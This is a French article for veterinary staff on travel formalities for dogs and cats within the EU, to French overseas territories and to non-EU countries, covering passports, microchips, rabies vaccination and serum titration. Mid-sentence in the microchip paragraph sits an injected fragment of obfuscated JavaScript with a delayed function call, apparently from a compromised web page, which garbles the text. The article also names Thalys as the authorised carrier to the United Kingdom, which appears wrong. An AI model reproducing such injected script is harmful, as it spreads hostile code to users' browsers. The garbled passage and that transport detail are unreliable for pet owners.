Animaux en voyage : Formalités


A l’approche de la saison estivale, nombreux seront les chiens et les chats à franchir les frontières. Tour d’horizon des principales informations à transmettre à votre clientèle.


 
Déplacement dans l’Union Européenne

Le transport (non commercial) de carnivores domestiques dans l’UE concerne les animaux de plus de 3 mois, période correspondant à la réalisation de la primo-vaccination antirabique possible à partir de 12 semaines et dont la validité est effective 21 jours plus tard.
 

Pour tous les voyages hors du territoire national le passeport européen est obligatoire, le document reprendra les informations concernant le numéro d’identification par puce électronique dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}(norme ISO 11784) et les dates de vaccinations antirabiques.
 

Le tatouage reste accepté s’il a été réalisé avant le 3 juillet 2011, à condition d’être lisible, à l’exception de l’Irlande, Malte et le Royaume-Uni.
 

De plus la Finlande, l’Irlande, Malte et le Royaume-Uni exigent pour les chiens, un traitement contre l’échino-coccose administré dans les 120 à 24 heures précédant l’entrée sur leur territoire. Ce traitement doit être enregistré sur le passeport par le vétérinaire.
 

L’acheminement pour le Royaume-Uni et Malte doit être effectué par un moyen de transport autorisé (le Thalys pour le Royaume-Uni). L’accès par bateau ou avion privés n’est pas autorisé.
 
Déplacement en Corse et dans les DOM TOM


Pour les déplacements en Corse, Guadeloupe, Martinique et Réunion seuls l’identification et le passeport sont demandés. Pour la Guyane il faut ajouter le vaccin antirabique.
 

Quant à la Nouvelle-Calédonie un permis d’importation est exigé ainsi que : certificat sanitaire international, titrage sérique, traitements antiparasitaires, des vaccins supplémentaires : maladie de Carré, hépatite, leptos- tirose, paravirose, rubarth, para-influenza, Bordetella bronchiseptica pour les chiens, coryza, panleucopénie infectieuse, chlamydiose, leucose pour les chats ainsi qu’une quarantaine de 10 jours près de Nouméa.
 

Pour la Polynésie Française, outre la plupart des exigences précédentes, sont demandés : une autorisation préalable, le vaccin contre la leishmaniose et le test de dépistage ainsi qu’une quarantaine avant le départ.
 

Pour ces deux derniers cas il est indispensable de se rapprocher des autorités et ce, bien avant le départ.
 
Déplacement hors UE

Pour les déplacements hors UE, deux cas se présentent, pour les pays de destination indemnes de rage les obligations générales sont celles exigées par l’UE : passeport, identification, vaccination antirabique, auxquelles il est conseillé d’ajouter un titrage sérique** souvent demandé pour le retour en France.
 De nombreuses obligations supplémentaires sont requises selon les pays. Il est donc fortement conseillé de se rapprocher de la représentation diplomatique du pays de destination.
 

Pour le cas de pays tiers non indemnes de rage en plus des obligations générales : passeport, identification, vaccination, titrage sérique, il est exigé un certificat sanitaire international établi 10 jours avant le départ, bilingue, rédigé par un vétérinaire titulaire du Mandat Sanitaire, le certificat doit être accompagné des justificatifs concernant la vaccination et, éventuellement, le titrage.
 

A cela s’ajoutent les nombreuses restrictions propres à chaque pays. Ces contraintes quelquefois très lourdes, notamment les quarantaines, supposent une anticipation de plusieurs mois.
 

Dans tous les cas nous vous conseillons de consulter sur bourgelat.com la rubrique “Infos pratiques” puis “Transport” et “Formalités aux frontières” qui reprend par le détail les exigences particulières ainsi que les différents contacts pour effectuer vos formalités.
 
 

**Le titrage sérique antirabique doit être effectué dans un laboratoire agréé (résultat égal ou supérieur à 0,5 Ul/ml), au moins 30 jours après la vaccination et au moins 3 mois avant l’importation sur l’animal identifié dont le vaccin antirabique est valide. Ce délai ne s’applique pas en cas de réintroduction en UE si le titrage avait été réalisé avec un résultat favorable. 
Le résultat du titrage est valide à vie si le vaccin antirabique est constamment validé.

Délai : 4 semaines environ, un exemplaire est adressé au vétérinaire et au propriétaire.
 
 
Jean-Jacques Chaux